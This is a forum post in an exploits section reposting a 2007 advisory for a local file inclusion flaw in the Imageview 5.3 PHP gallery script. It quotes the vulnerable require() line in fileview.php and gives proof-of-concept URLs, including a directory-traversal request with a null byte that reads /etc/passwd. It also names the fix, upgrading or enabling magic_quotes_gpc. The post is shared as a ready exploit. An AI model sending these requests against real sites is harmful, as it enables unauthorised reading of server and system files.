Jump to content
Ras

Imageview 5.3 (fileview.php album) Local File Inclusion Vuln

By Ras, in Exploituri

Recommended Posts

Ras Newbie

Ras

Posted
Posted 
\#'#/
                            (-.-)
   --------------------oOO---(_)---OOo-------------------
   | Imageview v5.3 (fileview.php) Local File Inclusion |
   |      (works only with magic_quotes_gpc = off)      |
   |                    coded by DNX                    |
   ------------------------------------------------------
[!] Discovered: DNX
[!] Vendor: [url]www.blackdot.be/?inc=projects/imageview[/url]
[!] Detected: 21.04.2007
[!] Reported: 21.04.2007
[!] Remote: yes

[!] Background: Imageview is an image gallery script based on PHP

[!] Bug: $_GET['album'] in fileview.php line 4

         require('albums/'.$_GET['album'].'/data.dat');

[!] PoC:
    - [url]http://[site]/[/url][path]/fileview.php?album=[file]%00
    - [url]http://[site]/[/url][path]/fileview.php?album=../../../../../../etc/passwd%00

[!] Solution: Install Imageview 6 or magic_quotes_gpc = on

# milw0rm.com [2007-04-29]

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...